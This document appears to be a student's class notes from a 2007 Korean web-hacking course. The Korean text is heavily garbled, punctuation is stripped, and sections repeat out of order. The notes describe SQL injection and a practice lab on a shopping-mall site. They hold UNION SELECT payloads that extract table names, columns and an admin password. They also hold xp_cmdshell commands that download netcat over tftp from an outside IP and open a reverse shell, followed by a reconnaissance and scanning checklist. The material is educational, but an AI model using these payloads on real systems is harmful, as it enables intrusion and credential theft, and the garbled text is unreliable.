ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

